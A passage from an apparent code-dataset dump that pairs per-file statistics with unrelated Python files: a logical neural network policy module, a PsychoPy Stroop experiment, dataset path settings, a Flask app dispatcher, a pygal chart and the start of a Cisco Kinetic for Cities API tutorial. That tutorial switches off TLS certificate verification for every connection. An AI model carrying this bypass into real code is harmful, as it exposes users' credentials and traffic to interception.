| 40.27551 | 88 | 0.624272 | 445 | 3,947 | 5.253933 | 0.229213 | 0.071856 | 0.032079 | 0.023097 | 0.124038 | 0.047049 | 0.023952 | 0 | 0 | 0 | 0 | 0.002841 | 0.286547 | 3,947 | 97 | 89 | 40.690722 | 0.827415 | 0 | 0 | 0.1 | 0 | 0 | 0.047124 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7144c085cff446c01b799bb109c5bbe09b0b02 | 3,216 | py | Python | policies.py | IBM/LOA | 9cd402c814f1d9c8b4de52ee18a3cb7ec2c6d07a | [
"MIT"
] | 12 | 2021-12-15T09:03:36.000Z | 2022-03-28T21:37:25.000Z | policies.py | IBM/LOA | 9cd402c814f1d9c8b4de52ee18a3cb7ec2c6d07a | [
"MIT"
] | 3 | 2022-01-04T18:03:01.000Z | 2022-03-31T16:15:25.000Z | policies.py | IBM/LOA | 9cd402c814f1d9c8b4de52ee18a3cb7ec2c6d07a | [
"MIT"
] | 4 | 2022-01-04T17:44:23.000Z | 2022-03-28T21:37:42.000Z | import os
import sys
import torch.nn as nn
if True:
DDLNN_HOME = os.environ['DDLNN_HOME']
meta_rule_home = '{}/src/meta_rule/'.format(DDLNN_HOME)
src_rule_home = '{}/dd_lnn/'.format(DDLNN_HOME)
sys.path.append(meta_rule_home)
sys.path.append(src_rule_home)
from lnn_operators \
import and_lukasiewicz, \
and_lukasiewicz_unconstrained, and_lukasiewicz_lambda
EPS = 1e-10
class SimpleAndLNN(nn.Module):
def __init__(self, arity=4, use_slack=True, alpha=0.95, constrained=True,
use_lambda=True):
super().__init__()
self.alpha = alpha
self.use_slack = use_slack
self.arity = arity
self.constrained = constrained
self.use_lambda = use_lambda
if use_lambda:
assert constrained, \
'Lambda LNN can only be used for constrained version'
if constrained:
if use_lambda:
self.and_node = and_lukasiewicz_lambda(alpha, arity, use_slack)
else:
self.and_node = and_lukasiewicz(alpha, arity, use_slack)
else:
self.and_node = \
and_lukasiewicz_unconstrained(alpha, arity, use_slack)
def forward(self, x):
final_pred, final_slack = self.and_node(x)
return final_pred, final_slack
def extract_weights(self, normed=True, verbose=False):
if self.constrained:
if self.use_lambda:
beta, wts = self.and_node.get_params()
else:
beta, wts, slacks = self.and_node.cdd()
else:
beta, wts = self.and_node.get_params()
if normed:
wts = wts / wts.max()
if verbose:
print('beta : ' + str(beta.item()))
print('argument weights : ' + str(wts.detach()))
return beta, wts
class PolicyLNNTWC_SingleAnd(nn.Module):
def __init__(self,
admissible_verbs,
use_constraint=True,
num_by_arity=None):
super().__init__()
alpha = 0.95
use_slack = True
self.alpha = alpha
self.use_slack = use_slack
self.use_constraint = use_constraint
self.admissible_verbs = admissible_verbs
self.models = nn.ModuleDict()
if num_by_arity is None:
self.total_inputs = {1: 6, 2: 12}
else:
self.total_inputs = num_by_arity
for v, arity in admissible_verbs.items():
self.init_model_for_verb(v, self.total_inputs[arity])
def init_model_for_verb(self, v, nb_inputs):
self.models[v] = \
SimpleAndLNN(arity=nb_inputs, use_slack=self.alpha,
alpha=self.alpha, constrained=self.use_constraint)
def compute_constraint_loss(self, lnn_model_name='go', lam=0.0001):
return \
self.models[lnn_model_name].\
and_node.compute_constraint_loss(lam=lam)\
if self.models[lnn_model_name].and_node.lam else 0.0
def forward_eval(self, x, lnn_model_name='go', split=True):
out, _ = self.models[lnn_model_name](x)
activations = out.view(1, -1) + EPS
return activations
| 30.056075 | 79 | 0.600435 | 403 | 3,216 | 4.506203 | 0.26799 | 0.044053 | 0.042401 | 0.029736 | 0.202093 | 0.155286 | 0.155286 | 0.093612 | 0.093612 | 0.051762 | 0 | 0.010733 | 0.304726 | 3,216 | 106 | 80 | 30.339623 | 0.801431 | 0 | 0 | 0.182927 | 0 | 0 | 0.036692 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 1 | 0.085366 | false | 0 | 0.04878 | 0.012195 | 0.207317 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e723b8f4a32d0c8a03c62c48807cc3c480dfc71 | 16,604 | py | Python | PsychoPy/testscript.py | esbenkc/Experimental-Methods-1 | e2fa12df0f98043ea83f61f439525a5e78978340 | [
"MIT"
] | null | null | null | PsychoPy/testscript.py | esbenkc/Experimental-Methods-1 | e2fa12df0f98043ea83f61f439525a5e78978340 | [
"MIT"
] | null | null | null | PsychoPy/testscript.py | esbenkc/Experimental-Methods-1 | e2fa12df0f98043ea83f61f439525a5e78978340 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy3 Experiment Builder (v3.1.3),
on June 24, 2019, at 16:21
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import absolute_import, division
from psychopy import locale_setup, sound, gui, visual, core, data, event, logging, clock
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
from psychopy.hardware import keyboard
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__))
os.chdir(_thisDir)
# Store info about the experiment session
psychopyVersion = '3.1.3'
expName = 'stroop' # from the Builder filename that created this script
expInfo = {'session': '01', 'participant': ''}
dlg = gui.DlgFromDict(dictionary=expInfo, sortKeys=False, title=expName)
if dlg.OK == False:
core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
expInfo['psychopyVersion'] = psychopyVersion
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data' + os.sep + '%s_%s' % (expInfo['participant'], expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath='C:\\Users\\lpzdb\\pavloviaDemos\\stroop\\stroop.py',
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
size=[1920, 1080], fullscr=True, screen=0,
winType='pyglet', allowGUI=False, allowStencil=False,
monitor='testMonitor', color='black', colorSpace='rgb',
blendMode='avg', useFBO=True,
units='height')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
frameDur = 1.0 / round(expInfo['frameRate'])
else:
frameDur = 1.0 / 60.0 # could not measure, so guess
# create a default keyboard (e.g. to check for escape)
defaultKeyboard = keyboard.Keyboard()
# Initialize components for Routine "instruct"
instructClock = core.Clock()
instrText = visual.TextStim(win=win, name='instrText',
text='OK. Ready for the real thing?\n\nRemember, ignore the word itself; press:\nLeft for red LETTERS\nDown for green LETTERS\nRight for blue LETTERS\n(Esc will quit)\n\nPress any key to continue',
font='Arial',
units='height', pos=[0, 0], height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
word = visual.TextStim(win=win, name='word',
text='default text',
font='Arial',
units='height', pos=[0, 0], height=0.15, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
# Initialize components for Routine "thanks"
thanksClock = core.Clock()
thanksText = visual.TextStim(win=win, name='thanksText',
text='This is the end of the experiment.\n\nThanks!',
font='Arial',
units='height', pos=[0, 0], height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# ------Prepare to start Routine "instruct"-------
t = 0
instructClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
ready = keyboard.Keyboard()
# keep track of which components have finished
instructComponents = [instrText, ready]
for thisComponent in instructComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "instruct"-------
while continueRoutine:
# get current time
t = instructClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *instrText* updates
if t >= 0 and instrText.status == NOT_STARTED:
# keep track of start time/frame for later
instrText.tStart = t # not accounting for scr refresh
instrText.frameNStart = frameN # exact frame index
win.timeOnFlip(instrText, 'tStartRefresh') # time at next scr refresh
instrText.setAutoDraw(True)
# *ready* updates
waitOnFlip = False
if t >= 0 and ready.status == NOT_STARTED:
# keep track of start time/frame for later
ready.tStart = t # not accounting for scr refresh
ready.frameNStart = frameN # exact frame index
win.timeOnFlip(ready, 'tStartRefresh') # time at next scr refresh
ready.status = STARTED
# keyboard checking is just starting
win.callOnFlip(ready.clearEvents, eventType='keyboard') # clear events on next screen flip
if ready.status == STARTED and not waitOnFlip:
theseKeys = ready.getKeys(keyList=None, waitRelease=False)
if len(theseKeys):
theseKeys = theseKeys[0] # at least one key was pressed
# check for quit:
if "escape" == theseKeys:
endExpNow = True
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in instructComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "instruct"-------
for thisComponent in instructComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('instrText.started', instrText.tStartRefresh)
thisExp.addData('instrText.stopped', instrText.tStopRefresh)
# the Routine "instruct" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
trials = data.TrialHandler(nReps=5, method='random',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('trialTypes.xls'),
seed=None, name='trials')
thisExp.addLoop(trials) # add the loop to the experiment
thisTrial = trials.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial:
exec('{} = thisTrial[paramName]'.format(paramName))
for thisTrial in trials:
currentLoop = trials
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial:
exec('{} = thisTrial[paramName]'.format(paramName))
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
word.setColor(letterColor, colorSpace='rgb')
word.setText(text)
resp = keyboard.Keyboard()
# keep track of which components have finished
trialComponents = [word, resp]
for thisComponent in trialComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
# get current time
t = trialClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *word* updates
if t >= 0.5 and word.status == NOT_STARTED:
# keep track of start time/frame for later
word.tStart = t # not accounting for scr refresh
word.frameNStart = frameN # exact frame index
win.timeOnFlip(word, 'tStartRefresh') # time at next scr refresh
word.setAutoDraw(True)
# *resp* updates
waitOnFlip = False
if t >= 0.5 and resp.status == NOT_STARTED:
# keep track of start time/frame for later
resp.tStart = t # not accounting for scr refresh
resp.frameNStart = frameN # exact frame index
win.timeOnFlip(resp, 'tStartRefresh') # time at next scr refresh
resp.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(resp.clock.reset) # t=0 on next screen flip
win.callOnFlip(resp.clearEvents, eventType='keyboard') # clear events on next screen flip
if resp.status == STARTED and not waitOnFlip:
theseKeys = resp.getKeys(keyList=['left', 'down', 'right'], waitRelease=False)
if len(theseKeys):
theseKeys = theseKeys[0] # at least one key was pressed
# check for quit:
if "escape" == theseKeys:
endExpNow = True
resp.keys = theseKeys.name # just the last key pressed
resp.rt = theseKeys.rt
# was this 'correct'?
if (resp.keys == str(corrAns)) or (resp.keys == corrAns):
resp.corr = 1
else:
resp.corr = 0
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in trialComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
trials.addData('word.started', word.tStartRefresh)
trials.addData('word.stopped', word.tStopRefresh)
# check responses
if resp.keys in ['', [], None]: # No response was made
resp.keys = None
# was no response the correct answer?!
if str(corrAns).lower() == 'none':
resp.corr = 1; # correct non-response
else:
resp.corr = 0; # failed to respond (incorrectly)
# store data for trials (TrialHandler)
trials.addData('resp.keys',resp.keys)
trials.addData('resp.corr', resp.corr)
if resp.keys != None: # we had a response
trials.addData('resp.rt', resp.rt)
trials.addData('resp.started', resp.tStartRefresh)
trials.addData('resp.stopped', resp.tStopRefresh)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
thisExp.nextEntry()
# completed 5 repeats of 'trials'
# get names of stimulus parameters
if trials.trialList in ([], [None], None):
params = []
else:
params = trials.trialList[0].keys()
# save data for this loop
trials.saveAsExcel(filename + '.xlsx', sheetName='trials',
stimOut=params,
dataOut=['n','all_mean','all_std', 'all_raw'])
# ------Prepare to start Routine "thanks"-------
t = 0
thanksClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(2.000000)
# update component parameters for each repeat
# keep track of which components have finished
thanksComponents = [thanksText]
for thisComponent in thanksComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "thanks"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = thanksClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *thanksText* updates
if t >= 0.0 and thanksText.status == NOT_STARTED:
# keep track of start time/frame for later
thanksText.tStart = t # not accounting for scr refresh
thanksText.frameNStart = frameN # exact frame index
win.timeOnFlip(thanksText, 'tStartRefresh') # time at next scr refresh
thanksText.setAutoDraw(True)
frameRemains = 0.0 + 2.0- win.monitorFramePeriod * 0.75 # most of one frame period left
if thanksText.status == STARTED and t >= frameRemains:
# keep track of stop time/frame for later
thanksText.tStop = t # not accounting for scr refresh
thanksText.frameNStop = frameN # exact frame index
win.timeOnFlip(thanksText, 'tStopRefresh') # time at next scr refresh
thanksText.setAutoDraw(False)
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in thanksComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "thanks"-------
for thisComponent in thanksComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('thanksText.started', thanksText.tStartRefresh)
thisExp.addData('thanksText.stopped', thanksText.tStopRefresh)
# Flip one final time so any remaining win.callOnFlip()
# and win.timeOnFlip() tasks get executed before quitting
win.flip()
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 41.51 | 201 | 0.668152 | 2,021 | 16,604 | 5.476497 | 0.242454 | 0.0206 | 0.008945 | 0.015179 | 0.500271 | 0.489339 | 0.451662 | 0.369353 | 0.369353 | 0.342971 | 0 | 0.011611 | 0.232293 | 16,604 | 399 | 202 | 41.614035 | 0.856672 | 0.333895 | 0 | 0.441948 | 0 | 0.003745 | 0.091625 | 0.006597 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037453 | 0 | 0.037453 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e745ff62ea6033b9af40da163096d4969eae110 | 3,856 | py | Python | EmbLearning/config.py | zhangjindou/SoLE | 2c20e39603ece315d571f8eb12674c6be8d378a4 | [
"MIT"
] | 2 | 2021-03-14T06:35:12.000Z | 2022-01-03T08:39:30.000Z | EmbLearning/config.py | zhangjindou/SoLE | 2c20e39603ece315d571f8eb12674c6be8d378a4 | [
"MIT"
] | null | null | null | EmbLearning/config.py | zhangjindou/SoLE | 2c20e39603ece315d571f8eb12674c6be8d378a4 | [
"MIT"
] | 1 | 2021-03-14T06:35:13.000Z | 2021-03-14T06:35:13.000Z | # ----------------------- PATH ------------------------
ROOT_PATH = "."
DATA_PATH = "%s/../Datasets" % ROOT_PATH
FB15K_DATA_PATH = "%s/fb15k" % DATA_PATH
DB100K_DATA_PATH = "%s/db100k" % DATA_PATH
FB15K_SPARSE_DATA_PATH = "%s/fb15k-sparse" % DATA_PATH
LOG_PATH = "%s/log_dir" % ROOT_PATH
CHECKPOINT_PATH = "%s/checkpoint" % ROOT_PATH
# ----------------------- DATA ------------------------
DATASET = {}
FB15K_TRAIN_RAW = "%s/train.txt" % FB15K_DATA_PATH
FB15K_VALID_RAW = "%s/valid.txt" % FB15K_DATA_PATH
FB15K_TEST_RAW = "%s/test.txt" % FB15K_DATA_PATH
FB15K_TRAIN = "%s/digitized_train.txt" % FB15K_DATA_PATH
FB15K_VALID = "%s/digitized_valid.txt" % FB15K_DATA_PATH
FB15K_TEST = "%s/digitized_test.txt" % FB15K_DATA_PATH
FB15K_E2ID = "%s/e2id.txt" % FB15K_DATA_PATH
FB15K_R2ID = "%s/r2id.txt" % FB15K_DATA_PATH
FB15K_GNDS = "%s/groundings.txt" % FB15K_DATA_PATH
FB15K_RULES = "%s/lifted_rules.txt" % FB15K_DATA_PATH
DATASET["fb15k"] = {
"train_raw": FB15K_TRAIN_RAW,
"valid_raw": FB15K_VALID_RAW,
"test_raw": FB15K_TEST_RAW,
"train": FB15K_TRAIN,
"valid": FB15K_VALID,
"test": FB15K_TEST,
"e2id": FB15K_E2ID,
"r2id": FB15K_R2ID,
"groundings": FB15K_GNDS,
}
DB100K_TRAIN_RAW = "%s/train.txt" % DB100K_DATA_PATH
DB100K_VALID_RAW = "%s/valid.txt" % DB100K_DATA_PATH
DB100K_TEST_RAW = "%s/test.txt" % DB100K_DATA_PATH
DB100K_TRAIN = "%s/digitized_train.txt" % DB100K_DATA_PATH
DB100K_VALID = "%s/digitized_valid.txt" % DB100K_DATA_PATH
DB100K_TEST = "%s/digitized_test.txt" % DB100K_DATA_PATH
DB100K_E2ID = "%s/e2id.txt" % DB100K_DATA_PATH
DB100K_R2ID = "%s/r2id.txt" % DB100K_DATA_PATH
DB100K_GNDS = "%s/groundings.txt" % DB100K_DATA_PATH
DATASET["db100k"] = {
"train_raw": DB100K_TRAIN_RAW,
"valid_raw": DB100K_VALID_RAW,
"test_raw": DB100K_TEST_RAW,
"train": DB100K_TRAIN,
"valid": DB100K_VALID,
"test": DB100K_TEST,
"e2id": DB100K_E2ID,
"r2id": DB100K_R2ID,
"groundings": DB100K_GNDS,
}
FB15K_SPARSE_TRAIN_RAW = "%s/train.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_VALID_RAW = "%s/valid.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_TEST_RAW = "%s/test.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_TRAIN = "%s/digitized_train.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_VALID = "%s/digitized_valid.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_TEST = "%s/digitized_test.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_E2ID = "%s/e2id.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_R2ID = "%s/r2id.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_GNDS = "%s/groundings.txt" % FB15K_SPARSE_DATA_PATH
DATASET["fb15k-sparse"] = {
"train_raw": FB15K_SPARSE_TRAIN_RAW,
"valid_raw": FB15K_SPARSE_VALID_RAW,
"test_raw": FB15K_SPARSE_TEST_RAW,
"train": FB15K_SPARSE_TRAIN,
"valid": FB15K_SPARSE_VALID,
"test": FB15K_SPARSE_TEST,
"e2id": FB15K_SPARSE_E2ID,
"r2id": FB15K_SPARSE_R2ID,
"groundings": FB15K_SPARSE_GNDS,
}
groundings = [str(50 + i * 5) for i in range(11)] + ['oneTime']
for item in groundings:
DATASET["fb15k_" + str(item)] = {
"train_raw": FB15K_TRAIN_RAW,
"valid_raw": FB15K_VALID_RAW,
"test_raw": FB15K_TEST_RAW,
"train": FB15K_TRAIN,
"valid": FB15K_VALID,
"test": FB15K_TEST,
"e2id": FB15K_E2ID,
"r2id": FB15K_R2ID,
"groundings": "%s/groundings_%s.txt" % (FB15K_DATA_PATH,str(item)),
}
for item in groundings:
DATASET["db100k_" + str(item)] = {
"train_raw": DB100K_TRAIN_RAW,
"valid_raw": DB100K_VALID_RAW,
"test_raw": DB100K_TEST_RAW,
"train": DB100K_TRAIN,
"valid": DB100K_VALID,
"test": DB100K_TEST,
"e2id": DB100K_E2ID,
"r2id": DB100K_R2ID,
"groundings": "%s/groundings_%s.txt" % (DB100K_DATA_PATH,str(item)),
}
# ----------------------- PARAM -----------------------
RANDOM_SEED = 123
| 34.428571 | 76 | 0.673237 | 534 | 3,856 | 4.430712 | 0.071161 | 0.125106 | 0.098901 | 0.088335 | 0.72612 | 0.581572 | 0.480981 | 0.346577 | 0.3153 | 0.243449 | 0 | 0.093683 | 0.158454 | 3,856 | 111 | 77 | 34.738739 | 0.635439 | 0.041753 | 0 | 0.357895 | 0 | 0 | 0.238147 | 0.052831 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e79f3580f36653daa75d2b29b580bf63af34199 | 932 | py | Python | Krypton/WebApp/__init__.py | BolunHan/Krypton | 8caf8e8efad6172ea0783c777e7df49a2ac512cb | [
"MIT"
] | null | null | null | Krypton/WebApp/__init__.py | BolunHan/Krypton | 8caf8e8efad6172ea0783c777e7df49a2ac512cb | [
"MIT"
] | null | null | null | Krypton/WebApp/__init__.py | BolunHan/Krypton | 8caf8e8efad6172ea0783c777e7df49a2ac512cb | [
"MIT"
] | null | null | null | from flask import Flask
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple
from Base import Telemetric, CONFIG
__all__ = ['start_app']
__version__ = "0.1.0"
LOGGER = Telemetric.LOGGER.getChild('WebApp')
APP = Flask(__name__)
HOSTNAME = CONFIG.get('WebApp', 'HOST', fallback='0.0.0.0')
PORT = CONFIG.getint('WebApp', 'PORT', fallback=80)
import WebApp.Monitor
import WebApp.FileServer
mounts = {
'/Monitor': WebApp.Monitor.FLASK_APP,
'/FileServer': WebApp.FileServer.FLASK_APP,
}
def start_app():
application = DispatcherMiddleware(APP, mounts)
if __name__ == '__main__':
for mount_path in mounts:
LOGGER.info(f'WebApp running on http://{HOSTNAME}:{PORT}/{mount_path}')
run_simple(
hostname=HOSTNAME,
port=PORT,
application=application
)
if __name__ == '__main__':
start_app()
| 23.3 | 83 | 0.683476 | 109 | 932 | 5.504587 | 0.422018 | 0.04 | 0.01 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012 | 0.195279 | 932 | 39 | 84 | 23.897436 | 0.788 | 0 | 0 | 0.071429 | 0 | 0 | 0.146996 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.214286 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7b1a04d745dc6e204362c61a41930cc35f005b | 682 | py | Python | class3/testsvg.py | dnsbob/pynet_testz | 8a4c778e8592efd796dc27417b7ae7ee4d9111cc | [
"Apache-2.0"
] | null | null | null | class3/testsvg.py | dnsbob/pynet_testz | 8a4c778e8592efd796dc27417b7ae7ee4d9111cc | [
"Apache-2.0"
] | null | null | null | class3/testsvg.py | dnsbob/pynet_testz | 8a4c778e8592efd796dc27417b7ae7ee4d9111cc | [
"Apache-2.0"
] | null | null | null | ''' testsvg.py '''
import pygal
fa4_in_packets = [24, 21, 40, 32, 21, 21, 49, 9, 21, 34, 24, 21]
fa4_out_packets = [21, 24, 21, 40, 32, 21, 21, 49, 9, 21, 34, 24]
# Create a Chart of type Line
line_chart = pygal.Line()
# Title
line_chart.title = 'Input/Output Packets and Bytes'
# X-axis labels (samples were every five minutes)
line_chart.x_labels = ['5', '10', '15', '20', '25', '30', '35', '40', '45', '50', '55', '60']
# Add each one of the above lists into the graph as a line with corresponding label
line_chart.add('InPackets', fa4_in_packets)
line_chart.add('OutPackets', fa4_out_packets)
# Create an output image file from this
line_chart.render_to_file('test.svg')
| 29.652174 | 93 | 0.678886 | 121 | 682 | 3.68595 | 0.561983 | 0.121076 | 0.053812 | 0.035874 | 0.09417 | 0.09417 | 0.09417 | 0.09417 | 0.09417 | 0.09417 | 0 | 0.127622 | 0.16129 | 682 | 22 | 94 | 31 | 0.652098 | 0.313783 | 0 | 0 | 0 | 0 | 0.175055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7b99b3286e2086dc64ba2272a4da8ef40cb9cf | 2,573 | py | Python | CKC102_python_example.py | sagenew/scc-ckc-api-examples | fd86e435877cf68f35d01b8314a47a08b83eb391 | [
"MIT"
] | null | null | null | CKC102_python_example.py | sagenew/scc-ckc-api-examples | fd86e435877cf68f35d01b8314a47a08b83eb391 | [
"MIT"
] | null | null | null | CKC102_python_example.py | sagenew/scc-ckc-api-examples | fd86e435877cf68f35d01b8314a47a08b83eb391 | [
"MIT"
] | null | null | null | import urllib.parse, urllib.request, json, ssl
# Authentication and API Requests
# LEARNING LAB 2 Cisco Kinetic for Cities
# The Initial login steps are the same as Learning Lab 1.
# You can skip ahead to 'LEARNING LAB 2 CODE BEGINS HERE'
#Ignore invalid Certificates
ssl._create_default_https_context = ssl._create_unverified_context
############################### LEARNING LAB 2 CODE BEGINS HERE ############################
#
# In this example, we will exercise the CKC API: {{Platform Instance URL}}/cdp/v1/locations/user/{userId}/info
# In the case of the Sandbox lab, this resolves to https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/locations/user/{userId}/info
# The access_token and user_id from Learning Lab 1 will be used to obtain the current Users Location Information
print('Learning Lab 2 Starts Here:')
